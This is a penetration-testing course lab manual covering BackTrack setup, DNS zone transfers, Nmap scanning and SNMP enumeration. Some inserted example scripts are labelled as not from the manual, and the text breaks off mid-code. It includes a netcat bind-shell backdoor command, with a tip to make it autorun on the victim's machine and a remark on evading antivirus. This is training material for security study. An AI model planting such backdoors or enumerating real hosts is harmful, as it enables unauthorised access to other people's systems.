St. Angelo's Professional Education Lab Manual v1.0
Contributing Authors:
Rajesh Vishwakarma
Vinod Singh
Satish Jha
Lalit Jha
Table of Contents
Program Overview ............................................................................................................................ 5
What is penetration testing? ........................................................................................................ 5
Objectives ..................................................................................................................................... 5
Pre-requisites ............................................................................................................................... 5
Course Contents ........................................................................................................................... 6
Module One: Art of Hacking ..................................................................................................... 6
Module Two: Scenario of Enterprise security .......................................................................... 6
Module Three: Planning and gathering Information................................................................ 6
Module Four: Social Engineering .............................................................................................. 6
Module Five: Taking on the system .......................................................................................... 7
Module Six: Attacking passwords ............................................................................................. 7
Module Seven: Malwares, Rootkits and Trojans ...................................................................... 7
Module Eight: Getting Offensive .............................................................................................. 8
Module Nine: Exploiting ........................................................................................................... 8
Module Ten: Report writing & Supporting compliance ........................................................... 9
NSD Penetration Testing Training Schedule
Day 1 Schedule
Day 2 Schedule
Day 3 Schedule
Day 4 Schedule
Day 5 Schedule
Group Discussions ...................................................................................................................... 10
Team Activities ........................................................................................................................... 10
Case studies ................................................................................................................................ 10
Assignments ............................................................................................................................... 11
Module One: Art of Hacking ........................................................................................................... 12
Group Discussion - Hacker Culture, Ethics and Rise of Anonymous .......................................... 12
Hacker Culture - Discuss the following questions: ................................................................. 12
Ethics - Discuss the following questions: ................................................................................ 12
Rise of Anonymous ................................................................................................................. 13
Group Discussion: What is a System? .................................................................................... 13
Scenario: ................................................................................................................................. 13
Assignment ............................................................................................................................. 13
Module Two: Scenario of Enterprise Security ................................................................................ 14
Scenario ...................................................................................................................................... 14
Challenges .................................................................................................................................. 14
Group Discussions: ..................................................................................................................... 15
Module Three: Planning and Gathering Information ..................................................................... 16
Getting Started With Backtrack: ................................................................................................. 16
Logging into backtrack: ........................................................................................................... 16
Changing default password .................................................................................................... 16
Starting the Graphical User Interface ..................................................................................... 16
Network configuration: .......................................................................................................... 16
Starting various services in Backtrack .................................................................................... 17
Navigating the System ............................................................................................................ 18
Pentest Directory .................................................................................................................... 21
Netcat overview ..................................................................................................................... 21
To Use netcat as a backdoor: ................................................................................................. 22
Exercises: ................................................................................................................................ 22
Foot-printing:.............................................................................................................................. 22
What is DNS: ........................................................................................................................... 23
Zone Transfer: ........................................................................................................................ 23
Dnsenum.pl ............................................................................................................................ 24
Using Dig ................................................................................................................................. 24
Using Whois ............................................................................................................................ 25
Exercises: ................................................................................................................................ 26
Using Maltego: ....................................................................................................................... 26
Scanning: .................................................................................................................................... 28
Tools – IP scanning: ................................................................................................................ 29
Nmap: ..................................................................................................................................... 29
Enumeration: .............................................................................................................................. 30
SNMP Enumeration: ............................................................................................................... 31
Steganography: Hiding Data within Data ....................................................................................... 33
Exercises ................................................................................................................................. 39
Module Four: Social Engineering .................................................................................................... 40
Social Engineering Concepts: ...................................................................................................... 40
Dumpster Diving ......................................................................................................................... 41
Module Five: Taking on the system ................................................................................................ 42
NTFS Alternate Streams: ........................................................................................................ 42
Physical Access Attacks: ......................................................................................................... 43
Reset Linux Passwords: .......................................................................................................... 43
Reset Windows Passwords: .................................................................................................... 44
Using chntpw .......................................................................................................................... 44
TCPDUMP (Network Analyzers) .............................................................................................. 46
Wireshark .............................................................................................................................. 49
Arp Spoofing (Ettercap) ....................................................................................................... 52
Module Six: Attacking passwords .............................................................................................. 55
HYDRA: Brute Force tool ..................................................................................................... 55
Using L0phtCrack to crack the hashes: .............................................................. 56
Module Seven: Malwares, Rootkits and Trojans ...................................................................... 58
Objectives: ............................................................................................................................. 58
Beast....................................................................................................................................... 59
Trojan ..................................................................................................................................... 59
Building a Trojan using Beast ............................................................................................. 59
Batch File Viruses.................................................................................................................. 67
theHarvester.py .............................................................................................................................. 70
Exercises ................................................................................................................................. 72
Module Eight: Getting Offensive ................................................................................................ 73
Common Web Application Attacks ....................................................................................... 73
Objective ............................................................................................................................... 73
Tools....................................................................................................................................... 73
Netcraft .................................................................................................................................. 73
Configuring WebGoat ......................................................................................................... 74
SQL Injection ......................................................................................................................... 75
Using Tamperdata ................................................................................................................ 76
Havij ....................................................................................................................................... 79
Cross Site Scripting .............................................................................................................. 82
Basic Authentication Flaws .................................................................................................. 84
Google Dorks ........................................................................................................................ 87
Module Nine: Exploiting .............................................................................................................. 88
Buffer Overflows: .................................................................................................................. 88
Using Ollydbg ....................................................................................................................... 91
Writing Shellcode: ................................................................................................................ 98
Metasploit: .......................................................................................................................... 101
Exercises:.............................................................................................................................. 105
Proxies and Tunneling Techniques ............................................................................................... 107
Proxies ...................................................................................................................................... 107
Pivoting (SSH tunneling) ....................................................................................................... 110
Exercises: .............................................................................................................................. 110
Program Overview
What is penetration testing?
A penetration test, sometimes shortened to pentest, is a method of evaluating the security of a computer system
or network by simulating an attack from malicious outsiders (who do not have an authorized means of
accessing the organization's systems) and malicious insiders (who have some level of authorized
access).
The process involves an active analysis of the system for any potential vulnerabilities that could result
from poor or improper system configuration, both known and unknown hardware or software flaws,
and operational weaknesses in process or technical countermeasures. This analysis is carried out from
the position of a potential attacker and can involve active exploitation of security vulnerabilities.
Security issues uncovered through the penetration test are presented to the system's owner. Effective
penetration tests will couple this information with an accurate assessment of the potential impacts to
the organization and outline a range of technical and procedural countermeasures to reduce risks.
Objectives
At the end of the training, the following objectives will be achieved:
Design and create attack plan methodologies
Understand social engineering aspects used for attacks
Get an insight into enterprise security trend
Use latest techniques to hack into systems and networks
Conduct regular audits and penetration tests in your company
Support legal team with Digital forensic evidence
Support compliance roadmaps based on standards for your organization
Support Internal Audit teams for IT security compliance
Pre-requisites
Background in A+ or MCSE recommended
Good documentation and presentation skills
A strong attitude and proactive approach for self-learning
Course Contents
Module One: Art of Hacking
History of hacking
Group Discussion: Hacker Culture, Ethics and Rise of Anonymous
The need of hacking
Group Discussion: What is a system?
Assignment: What is People, Process and Technology and how does it impact security?
Knowing your enemy
Module Two: Scenario of Enterprise security
Team Activity: Is IT security a cost center?
Technology Vs Management
Case study: Security budget across different verticals
Team Activity: Requesting new server in DC
Case study: Insider trading
Making the enterprise: Business Applications
Group Discussion: Why is it always possible to hack?
Module Three: Planning and gathering Information
Making the Plan
Information gathering approaches
Basics: Using BackTrack
Footprinting
Scanning
Enumeration
Group Discussion: What is your approach to gather information?
Team Activity: Gathering information about an organization
Identifying weakness
Module Four: Social Engineering
Introduction to Social Engineering
Assignment: Watch movies on “hacking”
Why people are the weakest link in security
Assignment: What is Body language?
Using Social Networking for effectively gaining trust
Scripting in daily life
Assignment: Read the book “Games people play”
Introduction to Reality Hacking
Group Discussion: Do you believe in Astrology?
Case study: Using Black magic and Occult science to hack!
Assignment: Influence a friend to wear specific clothes on a day by exploiting his/her belief
Team Activity: Using social engineering in daily life
Module Five: Taking on the system
Group Discussion: Windows vs Linux vs Mac
Introduction to systems
Assignment: Active Directory Fundamentals
Hiding Data – NTFS streaming
Gaining root access
Privilege Escalation
Man in the Middle attacks
Finding Vulnerabilities
Module Six: Attacking passwords
Password Hacking
Attacking Windows & Linux Passwords
Attacking application passwords
Group Discussion: Do you use the same passwords everywhere?
Case study: Most common passwords used
Using Brute Force Tools
Steganalysis concepts
Using Rainbow Tables
Team activity: Using online hash crackers
Default Passwords of devices
Case study: Impact of default passwords on security
Using Key loggers for stealing passwords
Team activity: Password recovery tools
Module Seven: Malwares, Rootkits and Trojans
Group Discussion: How would you define a malware?
Introduction to malwares
Team activity: List the features you would look for in a malware if you had to use one
Building a Trojan
Binding a Trojan to another file
Approaches for deploying a Trojan
Case study: Targeting Victims by fake games and movies
Target Harvesting
Rootkits and Botnets
Case study: How botnets work?
Team activity: Find most popular malwares impacting the mobile platforms.
Module Eight: Getting Offensive
Using data from Information gathering activity for attacks
Attacking web applications
Team Activity: Setting up WordPress on localhost
Group discussion: what mistakes can affect web application security?
Web server Security
Top 10 threats to Web Applications
Basic Authentication Attacks
SQL Injection & Cross site scripting
LFI / RFI
Advanced Google search techniques
Group discussion: DoS attacks impacting organizations
Sniffing networks
Module Nine: Exploiting
Memory concepts and File Format for executables
Quick Assembly introduction
Stack overflows from scratch
Introduction to Debuggers like IDA/Ollydbg
Introduction to Shellcodes
Introduction to Exploit Writing
Using exploit-db effectively
Creating a sample exploit
Metasploit – The Big Daddy
Introduction to msfencode/msfpayload
Manual Shellcode Writing and Automatic Shellcode Generation
Introduction to Fuzzing and Fuzzing framework
Client Side Exploitation Techniques
Concept of tunneling and techniques
Evading Firewalls by hopping through the tunnels using proxy servers
smb fun – windows and linux
The art of exploit writing ( Windows and Linux)
Different types of exploits, including off-by-one and race conditions
Anti Virus Evasion
Setting up a lab
Module Ten: Report writing & Supporting compliance
Building professional reports – basics
Team activity: Create a VA report
Introduction to ISO 27001
Discussion: Security as a continuous process
Introduction to SIEM technologies
Group Discussion: Impact of Log Analysis & correlation
Importance of Audits
Team Activity: Communicating with management
Team Activity: Forming a steering committee
Group discussion: What will you expect from VA reports as a CISO?
Group discussion: Importance of training
Group discussion: Patch Management
Assignment: What is Asset management?
Best practices & Case study
Group Discussions
01 Hacker Culture, Ethics and Rise of Anonymous
02 What is a system?
03 Why is it always possible to hack?
04 What is your approach to gather information?
05 Do you believe in Astrology?
06 Windows vs Linux vs Mac
07 Do you use the same passwords everywhere?
08 How would you define a malware?
09 What mistakes can affect web application security?
10 DoS attacks impacting organizations
11 Security as a continuous process
12 Impact of Log Analysis & correlation
13 What will you expect from VA reports as a CISO?
14 Importance of training
15 Patch Management
Team Activities
01 Is IT security a cost center?
02 Requesting new server in DC
03 Gathering information about an organization
04 Using social engineering in daily life
05 Using online hash crackers
06 Password recovery tools
07 List the features you would look for in a malware if you had to use one
08 Find most popular malwares impacting the mobile platforms.
09 Setting up WordPress on localhost
10 Create a VA report
11 Communicating with management
12 Forming a steering committee
Case Studies
01 Security budget across different verticals
02 Insider trading
03 Using Black magic and Occult science to hack!
04 Most common passwords used
05 Impact of default passwords on security
06 Targeting Victims by fake games and movies
07 How botnets work?
Assignments
01 What is People, Process and Technology and how does it impact security?
02 Watch movies on "hacking"
03 What is Body language?
04 Read the book "Games people play"
05 Influence a friend to wear specific clothes on a day by exploiting his/her belief
06 Active Directory Fundamentals
07 What is Asset management?
Module One: Art of Hacking
India is known for its capability in Information Technology. But it is also a fact that India is one of the
top countries with the highest rates of cybercrime incidents and computer virus infections. This affects
not only a lot of individuals, but also businesses and the Government, who are regular targets of
coordinated hacking attacks.
But what is the History of Hacking? How did it all start?
Your Instructor will walk you through the amazing history!
Meanwhile, visit these links!
http://en.wikipedia.org/wiki/Timeline_of_computer_security_hacker_history
http://freehacking.org/hackerhistory/
Group Discussion - Hacker Culture, Ethics and Rise of Anonymous
Hacker Culture - Discuss the following questions:
1. What do you think is Hacker Culture? Who defines it?
2. What is the description of a hacker?
3. What kind of perception do people in general have of hackers?
4. What do you think are the trends in hacker culture over the last 5 years?
5. List down at least 5 significant aspects that you feel define the cult and culture of hackers.
6. Discuss about Aaron Swartz - what do you think about the case and fairness of law related to
hacking?
7. Submit a one page write-up (300 words or more) on your view of Aaron Swartz case, hacker
culture and its importance to your Instructor.
Ethics - Discuss the following questions:
1. What are ethics? Do you feel Hackers have ethics as part of their hacker culture?
2. How are ethics different from code of conduct?
3. How do ethics play a role in defining a White Hat, Black Hat or Grey Hat Hacker?
4. What do you think is the most important ethic that needs to be followed by Hackers?
5. If you find a vulnerability in a company website while surfing the Internet, what action will you
take and how will your action be ethical?
6. What do you think of Wikileaks? How ethical do you think the concept of Wikileaks is, and
what is its impact?
7. Submit a one page write-up (300 words or more) on your view of Wikileaks and Computer
Ethics to your Instructor.
Rise of Anonymous
1. What do you think is Anonymous all about?
2. Do you think the actions of Anonymous are ethical?
3. What do you think is the impact of Anonymous on freedom of Internet?
4. What are the legal risks of starting such groups and getting caught?
5. Does the society derive any benefit or is there a larger good from actions of such groups?
6. Submit a one page write-up (300 words or more) on the role of hacker groups, hacktivism and their
potential impact on the Internet.
Group Discussion: What is a System?
1. What are the components of a system? List down the components you can think of and give it
to your Instructor.
2. What is the definition of a system? Is it a computer? A mouse? A CPU? A process?
3. What are networks? What makes up a network?
4. List some devices required to create a network and try explaining their generic working.
5. What is a Client / Server Model?
6. What are web applications? What are the components of a web application?
7. When you open a web-page, what all actions happen behind the scenes to deliver the content
to you?
Scenario:
You need to send a letter from one building to another, but the road is filled with terrorists; they will
shoot you if you step outside. What kind of approach will you take to deliver it, and why?
Assignment
What is People, Process and Technology and how does it impact security?
Submit your assignment in a word document in approximate 300 words or more to your Instructor.
Module Two: Scenario of Enterprise Security
In this activity, you are going to try to understand the real-life challenges of running an organization versus
the priority given to security.
Scenario
Background - First Company
You are working for ACME SOFT - a start-up software development company with a budget of INR Ten Lacs for
one year. The company has 7 employees as follows:
Employee 1: Founder / Managing Director – responsible for finances
Employee 2: Project Manager / Developer – responsible for project completion
Employee 3: IT Manager – responsible for IT infra and Security
Employee 4,5,6,7 - Developers
ACME SOFT has developed a software product that costs Rs.25000 per license. The company is
planning to hire more employees to expand its operations and develop a new product that will
take 6 months to create.
Background - Second Company
You are working for ACME SECURE - a start-up security consulting company with a capital of INR Ten
Lacs. The company has 6 employees as follows:
Employee 1: Founder / Managing Director – responsible for finances
Employee 2: Project Manager / Pre-sales Manager – responsible for Sales & business
Employee 3: Security Engineer – responsible for after-sales support, product deployment, etc.
Employee 4,5,6 - Junior Staff
ACME SECURE has developed a security product that costs Rs.9000 to make for each software
license. It can make software more secure from hacking and is very useful for software development
companies.
Challenges
Task One: The Group leader from each company must allocate budget for:
Salary for employees
Budget for IT Infrastructure
Budget for Marketing
Budget for running company / taxes
Task Two: ACME SECURE has to give a demonstration to ACME SOFT about their product and sell it.
Group Discussions:
1. How will ACME SECURE sell this product? What are the challenges?
2. Who needs to be convinced in ACME SOFT to buy the product?
3. How will ACME SOFT manage and plan the budget for new employees for 6 months with a
given capital? Will this be impacted if they plan to buy the security product from ACME
SECURE?
4. Why will ACME SOFT require the security product?
5. What are the risks of ACME SOFT not buying the security product?
6. What are the financial risks if ACME SOFT buys the security product? Is it a priority?
7. How will ACME SECURE sustain itself if ACME SOFT does not buy it?
8. Do you think ACME SOFT IT Manager can do his job properly if he does not get the required
hardware and software for security of the company products and data?
9. Do you think ACME SOFT MD will care about security if he does not make enough revenue to
run the company and pay employees on time?
10. Do you think security is a cost center? Why?
Module Three: Planning and Gathering Information
Getting Started With Backtrack:
Objectives: At the end of this module you should be able:
To work with the BackTrack Linux OS.
To use various Linux commands.
To locate the tools, software and scripts used in penetration testing.
Logging into backtrack:
Once you boot into BackTrack, you can log in with the following credentials:
The default user name is: root
The default password is: toor
Changing default password
You can change the password using the command:
root@bt:~# passwd
Starting the Graphical User Interface
In order to get into a GUI interface you'll have to execute the following command:
root@bt:~# startx
Network configuration:
Setting up IP manually: We can set the IP address using the GUI interface, but it's better to use the
command line once you are familiar with it.
First, check for available Ethernet devices by executing the command
root@bt:~# ifconfig
In order to make the following changes:
IP Address - 192.168.1.11
Default Gateway - 192.168.1.1
DNS server - 192.168.1.1
We will have to execute the following commands (Where eth0 is the network interface name)
Step 1:
root@bt:~# ifconfig eth0 192.168.1.11
Step 2:
root@bt:~# route add default gw 192.168.1.1
Step 3:
root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf
To enable the device, run the following command:
root@bt:~# ifup eth0
To disable it:
root@bt:~# ifdown eth0
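The three steps above run as root with no checks on what was typed, and the `echo ... > /etc/resolv.conf` step replaces the whole resolver file. The following script is an added example (not from the manual or the BackTrack project) that wraps the same procedure in functions that validate the addresses first, refuse a gateway that is not on the host's /24, and append the nameserver line instead of overwriting the file. It assumes a /24 network (netmask 255.255.255.0, which the manual's `ifconfig` line leaves implicit); the interface name and addresses are the manual's example values.

```shell
#!/bin/sh
# Added example, not from the manual: wraps the manual's static IP procedure
# (ifconfig / route add / nameserver / ifup) in functions that validate their
# inputs before anything touches the network. Assumptions: a /24 network
# (netmask 255.255.255.0) and the manual's example values eth0 / 192.168.1.11 /
# 192.168.1.1.

# validate_ipv4 ADDR: succeed only for a dotted quad with four octets of 0-255.
validate_ipv4() {
    addr=$1
    case $addr in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    count=0
    oldifs=$IFS
    IFS=.
    for octet in $addr; do
        count=$((count + 1))
        if [ "$octet" -gt 255 ]; then
            IFS=$oldifs
            return 1
        fi
    done
    IFS=$oldifs
    [ "$count" -eq 4 ]
}

# same_24 IP GW: the gateway must share the first three octets with the host
# address, otherwise the kernel rejects the default route as unreachable.
same_24() {
    [ "${1%.*}" = "${2%.*}" ]
}

# static_ip_commands IFACE IP GW: validate, then print the manual's commands
# in order. Printing (rather than running) lets you review them unprivileged.
static_ip_commands() {
    iface=$1 ip=$2 gw=$3
    validate_ipv4 "$ip" || { echo "invalid IP address: $ip" >&2; return 1; }
    validate_ipv4 "$gw" || { echo "invalid gateway: $gw" >&2; return 1; }
    same_24 "$ip" "$gw" || { echo "gateway $gw is not on the /24 of $ip" >&2; return 1; }
    printf 'ifconfig %s %s netmask 255.255.255.0\n' "$iface" "$ip"
    printf 'route add default gw %s\n' "$gw"
    printf 'ifup %s\n' "$iface"
}

# add_nameserver FILE DNS: append a nameserver line if it is not already there.
# The manual's 'echo nameserver ... > /etc/resolv.conf' replaces the whole file,
# which silently drops any other resolvers configured on the box.
add_nameserver() {
    file=$1 dns=$2
    validate_ipv4 "$dns" || { echo "invalid DNS server: $dns" >&2; return 1; }
    if [ -f "$file" ] && grep -qx "nameserver $dns" "$file"; then
        return 0
    fi
    printf 'nameserver %s\n' "$dns" >> "$file"
}

# apply_static_ip IFACE IP GW DNS: run the steps for real (needs root).
apply_static_ip() {
    [ "$(id -u)" -eq 0 ] || { echo "run as root" >&2; return 1; }
    static_ip_commands "$1" "$2" "$3" > /dev/null || return 1
    validate_ipv4 "$4" || return 1
    ifconfig "$1" "$2" netmask 255.255.255.0 &&
        route add default gw "$3" &&
        add_nameserver /etc/resolv.conf "$4" &&
        ifup "$1"
}

# Dry run with the manual's values: the commands are printed, not executed.
static_ip_commands eth0 192.168.1.11 192.168.1.1
```

Run the file as-is to see the three commands the manual types; call `apply_static_ip eth0 192.168.1.11 192.168.1.1 192.168.1.1` as root to actually apply them. Validating before acting matters here because a typo in the gateway or a mistyped `>` in the resolv.conf step leaves the box without working DNS or a default route, which on a lab VM is easy to mistake for a network problem elsewhere.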
Starting various services in Backtrack
Backtrack has various services such as Apache, SSH, MySQL, VNC, etc.
To start a service such as SSH, you can use the service init scripts.
Starting SSH:
Step 1: Generating SSH key
root@bt:~# sshd-generate
Step 2: Starting SSH service
root@bt:~# /etc/init.d/ssh start
To stop service
root@bt:~# /etc/init.d/ssh stop
Apache:
Starting Apache
root@bt:~# /etc/init.d/apache2 start
Stopping Apache
root@bt:~# /etc/init.d/apache2 stop
Navigating the System
When you first login, your current working directory is your home directory.
To find out what is in your home directory, type
root@bt:~# ls
The ls command (lowercase L and lowercase S) lists the contents of your current working directory.
cd command: used to change the working directory. To change the working directory, type:
root@bt:~# cd (directory name)
mkdir (make directory )
This command creates a new directory. To make a new directory, type:
root@bt:~# mkdir (directory name)
cp (copy)
This command copies files; the syntax is:
root@bt:~# cp SOURCE DEST
cat (concatenate)
cat is one of the most frequently used commands. It has three related functions with regard to
text files: displaying them, combining copies of them and creating new ones.
locate
The locate command is often the simplest and quickest way to find the locations of files and
directories.
The basic syntax for locate is:
locate [options] name(s)
Example of the command:
Pentest Directory
Most of the tools are located either in the path or in the /pentest directory. The tools in the /pentest
directory are categorized and subcategorized by attack vector and tool.
Some of the important directories are:
./backdoors: This folder contains various backdoors which can be used to maintain access in a
target system.
./exploits: This folder contains various exploits for Windows, Linux etc., written in various languages
like Perl, Python etc., which can be used to hack into a system.
./passwords: This folder contains password cracking tools.
Netcat overview
Netcat, also called "the Swiss army knife", is a utility used to read and write data across TCP and UDP network connections.
Using netcat an attacker can place a backdoor that will allow him/her to telnet to a DOS shell.
In fact netcat can be used as a port scanner, banner grabbing tool, Trojan and backdoor. The power of
netcat can be judged from the fact that it can act as both server and client and is often not
detected by anti-virus; even if it is detected, its source code is available, so adding some unnecessary
code will change its signature and allow it to bypass anti-virus. This tutorial is aimed at
complete beginners to netcat.
We can also use netcat as a banner grabbing tool, that is, to grab the application version:
C:\>nc -v -n 10.42.43.12 80
-v - verbose output
-n - do not resolve DNS names; keep all addresses numeric
To Use netcat as a backdoor:
First, get the netcat executable (nc.exe) onto the target's C:\windows\system32 directory. Then
make a batch file with the following command in it:
nc -L -d -p <port No> -t -e cmd.exe
Tip: One trick is to make this batch file an autorun/startup script, so that whenever the system starts
the script runs automatically. There are lots of other tricks that can be used; just find your way. Once
that batch file is run, you can telnet or use netcat in client mode to connect to it.
Here's how to use netcat to connect to it:
In a command prompt, give the command
C:\WINDOWS\>nc -v <IP Address> <port No>
Once you are connected to that port on the victim's computer, you'll have a command prompt on which you
can give any command on the victim's computer.
Exercises:
Use the locate command to locate the theHarvester tool.
Use the find command to find the .lst files in backtrack.
Name at least five tools in each directory of /pentest.
Create a text file using cat and use cat to display it on screen.
Foot-printing:
Objectives: At the end of this module you should be able:
To learn the techniques used to gather information on a target computer system.
To effectively use DNS and network information gathering tools.
To gather public information from various search engines and websites.
To profile a target organization/network effectively.
What is DNS:
The domain name system (DNS) is the way that Internet domain names are located and translated into
Internet Protocol addresses. A domain name is a meaningful and easy-to-remember "handle" for an
Internet address.
DNS servers hold a lot of information about a domain's IP addresses, which is essential when
attacking a system. Knowing all the IP addresses of a particular domain increases
the success rate of an attack.
Zone Transfer:
A Zone Transfer is the term used to refer to the process by which the contents of a DNS Zone file are
copied from a primary DNS server to a secondary DNS server.
A zone transfer takes place
When starting the DNS Service on the secondary DNS server.
When the refresh time expires.
When changes are saved to the Primary Zone file and there is a Notify List.
A zone transfer should take place only from a primary DNS server to a secondary DNS server, where the
secondary DNS server is a registered DNS server.
But in certain cases, where the primary DNS server fails to check the authenticity of the secondary
server, it will transfer the zone to any system that requests a zone transfer.
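On the server side the misconfiguration just described comes down to a single directive. The BIND named.conf fragment below is an example added here, not taken from the manual; it shows the open setting beside an alternative that restricts AXFR to the registered secondary and requires a TSIG signature (the two zone blocks are alternatives, not meant to coexist). The key name, secret and the 192.0.2.53 address are placeholders.

```conf
// Open: any client that asks receives the whole zone. This is the
// misconfiguration that an AXFR query with dig or host reveals.
zone "example.com" {
    type master;
    file "db.example.com";
    allow-transfer { any; };
};

// Restricted: only the registered secondary may pull the zone, and it must
// sign the request with a shared TSIG key. An address-based ACL alone is
// weaker, because it trusts whoever can reach the server from that address.
key "xfer-key" {                        // placeholder key name
    algorithm hmac-sha256;
    secret "PLACEHOLDER-BASE64-SECRET";  // generate with tsig-keygen
};

zone "example.com" {
    type master;
    file "db.example.com";
    also-notify { 192.0.2.53; };        // placeholder secondary address
    allow-transfer { key "xfer-key"; }; // AXFR only with a valid signature
};
```

With the restricted configuration in place, the dig and host zone-transfer commands shown in this section should return a transfer-failed or refused answer from anywhere except the secondary.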
A zone transfer can be performed with any of the following tools. There are also automated scripts in
our backtrack OS which extend and ease the process of performing a zone transfer.
o Dig
o Host
o Dnsenum.pl <Backtrack Tool>
o Fierce.pl <Backtrack Tool>
The following snippet shows how a zone is transferred from primary to secondary DNS server
Dnsenum.pl
This tool automatically finds out information about DNS, including name servers, mail servers and
zone transfers.
The tool is located at /pentest/enumeration/dns/dnsenum/
# dnsenum <domain>
Using Dig
Domain Information Groper (dig) is a network administration command-line tool for querying Domain
Name System (DNS) name servers for any desired DNS records.
Dig is useful for network troubleshooting and for educational purposes. Dig can operate in interactive
command line mode or in batch mode by reading requests from an operating system file.
When a specific name server is not specified in the command invocation, it will use the operating
system's default resolver, usually configured via the /etc/resolv.conf file. Without any arguments it
queries the DNS root zone.
# dig example.com
Example of Dig command
To perform a zone transfer use the following command
# dig @<nameserver> example.com AXFR
host: example usage: host example.com
Host command returns the Internet address of a host machine when the <HostName> parameter is
specified and the name of the host when the Address parameter is specified.
Depending on the configuration of name resolution service, the host command may also display any
aliases associated with the <HostName> parameter.
The host command can also be used to perform a zone transfer by using "-l" as an option:
host -l <domain name> <nameserver>
Using Whois
Whois is a query and response protocol that is widely used for querying databases that store the
registered users or assignees of an Internet resource, such as a domain name, an IP address block, or
an autonomous system, but is also used for a wider range of other information. The protocol stores
and delivers database content in a human-readable format.
The following image shows the details returned by the whois command.
whois: example usage: whois example.com
Apart from these tools we can use other online tools available from the following sites:
http://remote.12dt.com/
www.yougetsignal.com
www.domainresearchtool.com
www.netcraft.com
www.domaintools.com
www.who.is
www.hackersforcharity.org
http://www.exploit-db.com/google-dorks/
Exercises:
Use the following tools and explain the functioning with an example:
○ Ping
○ Traceroute
○ NSLookup
○ Netcraft
Using Maltego:
Maltego is an information gathering tool that lets you see relationships visually. Maltego allows
you to enumerate network and domain information like:
Domain Names
Whois Information
DNS Names
Netblocks
IP Addresses
Maltego also allows you to enumerate People information like:
Email addresses associated with a person's name
Web sites associated with a person's name
Phone numbers associated with a person's name
Social groups associated with a person's name
Companies and organizations associated with a person's name
Maltego also allows you to:
Do simple verification of email addresses
Search blogs for tags and phrases
Identify incoming links for websites
Extract metadata from files from target domains
Maltego can be used for the information gathering phase of all security related work. It will save you
time and will allow you to work more accurately and smarter. Maltego aids you in your thinking
process by visually demonstrating interconnected links between searched items.
Maltego provides you with a much more powerful search, giving you smarter results. If access to
"hidden" information determines your success, Maltego can help you discover it.
Maltego supports 4 types of layout algorithms:
Block layout. This is the default layout and is also used during mining. This layout is
discussed in more depth later.
Hierarchical layout. Think of this as a tree-based layout, like a file manager.
Centrality layout. Nodes that are most central to the graph (e.g. most incoming links) appear
in the middle with the other nodes scattered around them.
Organic layout. Nodes are packed tightly together in such a way that the distance between
each node and all the other nodes is minimized.
We can start by taking a name, and use Maltego to enumerate possible email addresses. The first
thing we have to do is input our search terms. First Name: XYZ, Surname: ZYX. You can also use
additional search terms like Country Code and Additional Search Term.
The result is a neat graph showing us the relationship of the entity to other entities and their
information.
Exercises:
Students are recommended to work on Maltego from their Backtrack OS and perform
transformations on at least three different entities.
Document every finding on each entity examined.
Warning: Students should not run all transformations at once, as this consumes a lot of bandwidth.
You should not cause any trouble for the owner of the entity!
Scanning:
Port scanning is one of the most common reconnaissance techniques used by testers to discover the
vulnerabilities in the services listening at well-known ports.
Once you've identified the IP address of a target system through footprinting, you can begin the
process of port scanning: looking for holes in the system through which you, or a malicious intruder,
can gain access.
A typical system has 2^16 - 1 = 65,535 port numbers, each with its own TCP and UDP port that can be used to
gain access if unprotected.
Three phases are included in scanning
1. IP scanning.
2. Port scanning.
3. Vulnerability scanning.
IP scanning: Scanning for live systems
Examples:
○ Angry IP scanner
○ Unicornscan
○ Advanced IP scanner
Port scanning: Scanning the systems for open ports
Examples:
○ Nmap
○ Autoscan
○ Netifera
Vulnerability scanning: Scanning the system for any vulnerability in the services.
Examples:
○ Nessus
○ Core Impact
○ Acunetix
Tools – IP scanning:
Angry Ip Scanner:
Nmap:
The best in the market for Port scanning, Nmap gives us Information about the services running on a
specific port, operating system details, NetBIOS Information, Shared Folders and lots more.
Steps to use the program:
Open Zenmap (Graphical User Interface for Nmap).
Provide the Target IP or Range.
Select the Profile to scan.
Click on Scan to start the scan.
You can also provide any extra options to the current scan in the Command Box.
Results can be viewed in the Nmap Output Pane.
Nmap - Interesting options
● -f fragments packets
● -D Launches decoy scans for concealment
● -I IDENT Scan – finds owners of processes (on Unix systems)
● -b FTP Bounce
Port Scan Types
● TCP Connect scan
● TCP SYN scan
● TCP FIN scan
● TCP Xmas Tree scan (FIN, URG, and PUSH)
● TCP Null scan
● TCP ACK scan
● UDP scan
Enumeration:
Objectives: At the end of this module you should be able to:
Enumerate systems on the network.
Effectively use the SNMP protocol to gather information about systems and the network.
Description:
Enumeration is making an ordered list of items; here we try to enumerate the devices/nodes in a network,
which makes the later penetration part easier.
SNMP Enumeration:
SNMP is based on UDP, a stateless protocol, and is therefore susceptible to IP spoofing. In addition,
SNMP has a weak authentication system for both private and public community strings. These
community strings are passed unencrypted on the network and are often left in their default state,
"private" and "public".
Examining information from a Windows host running SNMP can be done by using the following
command:
snmpwalk -c public -v1 <ip address> 1
To view the system info we can pass the following arguments to snmpwalk:
root@bt:~# snmpwalk -c public -v1 192.168.0.110 SNMPv2-MIB::sysDescr.0
SNMPv2-MIB::sysDescr.0 = STRING: Hardware: x86 Family 15 Model 4 Stepping 8 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0 (Build 2195 Uniprocessor Free)
Enumerating Windows Users:
BT-ARKZ # snmpwalk -c public -v1 192.168.0.110 1.3 | grep 77.1.2.25 | cut -d" " -f4
"Guest"
"Administrator"
"IUSR_WIN2KSP4"
"IWAM_WIN2KSP4"
"TsInternetUser"
"NetShowServices"
Enumerating Windows Services:
BT-ARKZ # snmpwalk -c public -v1 192.168.0.110 | grep hrSWRunName | cut -d" " -f4
"System"
"System"
"smss.exe"
"csrss.exe"
"snmp.exe"
Enumerating TCP ports:
BT-ARKZ # snmpwalk -c public -v1 192.168.0.110 1 | grep tcpConnState | cut -d"." -f6 | sort -nu
21
25
80
Beyond the examples above there are lots of other interesting arguments or commands that
can be given to snmpwalk to enumerate many more things. But with backtrack we need not
worry about remembering all that stuff:
you can use snmpenum.pl and snmpcheck.pl to enumerate all available info.
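The three pipelines above each pull one field out of snmpwalk output with grep and cut. The Python below is an added example, not from the manual: it parses a whole walk once and recovers the same three lists, decoding the LAN Manager user names from their OID index as a cross-check on the quoted value. The input is constructed to match the snmpwalk -v1 output format shown above; no device is queried, and the same code is what you would run over a walk of your own agents to see what a default community string exposes.

```python
"""Parse snmpwalk -v1 output into the system description, process list,
listening TCP ports and Windows user names that the manual extracts with
separate grep/cut pipelines.

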